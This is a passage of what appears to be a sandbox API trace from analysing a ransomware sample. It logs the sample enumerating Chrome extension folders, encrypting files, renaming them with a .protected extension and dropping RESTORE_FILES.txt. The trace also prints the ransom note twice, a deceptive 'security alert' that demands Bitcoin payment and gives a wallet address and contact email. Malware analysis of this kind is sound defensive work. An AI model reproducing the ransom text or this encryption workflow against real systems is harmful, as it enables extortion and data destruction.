(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.538] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.538] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.538] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.539] CloseHandle (hObject=0x164) returned 1 [0081.539] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.539] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0081.539] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0081.539] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0081.539] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0081.539] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0081.539] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th") returned 141 [0081.539] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0081.539] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0081.539] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\*") returned 143 [0081.539] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.539] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.539] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.539] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.539] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.539] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.539] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\.") returned 143 [0081.539] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.539] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.539] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.539] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.539] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.539] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.539] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.539] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\..") returned 144 [0081.539] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.539] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.539] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.539] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.539] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.539] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.539] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.539] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.539] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json") returned 155 [0081.539] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.540] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.540] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.540] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.540] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json") returned 155 [0081.540] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.540] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json") returned 155 [0081.540] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.540] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json") returned 155 [0081.540] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.540] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x144, lpOverlapped=0x0) returned 1 [0081.541] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffebc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.541] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x144, lpOverlapped=0x0) returned 1 [0081.541] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.541] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.541] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.541] CloseHandle (hObject=0x168) returned 1 [0081.541] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.protected") returned 165 [0081.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.protected")) returned 1 [0081.542] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.542] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.542] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\RESTORE_FILES.txt") returned 159 [0081.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.542] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.542] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.543] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.543] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.543] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.543] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.543] CloseHandle (hObject=0x164) returned 1 [0081.543] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.543] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0081.543] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0081.543] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0081.543] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0081.543] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0081.543] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr") returned 141 [0081.543] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0081.543] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0081.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\*") returned 143 [0081.543] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.544] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.544] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.544] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.544] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.544] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.544] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\.") returned 143 [0081.544] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.544] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.544] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.544] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.544] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.544] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.544] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.544] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\..") returned 144 [0081.544] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.544] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.544] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.544] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.544] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.544] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.544] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.544] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.544] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json") returned 155 [0081.544] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.544] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.544] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.544] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.545] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json") returned 155 [0081.545] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.545] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json") returned 155 [0081.545] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.545] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json") returned 155 [0081.545] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.545] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.545] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.545] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.545] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.546] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.546] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.546] CloseHandle (hObject=0x168) returned 1 [0081.546] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.protected") returned 165 [0081.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json.protected")) returned 1 [0081.546] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.546] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.546] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\RESTORE_FILES.txt") returned 159 [0081.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.547] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.547] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.547] lstrlenA 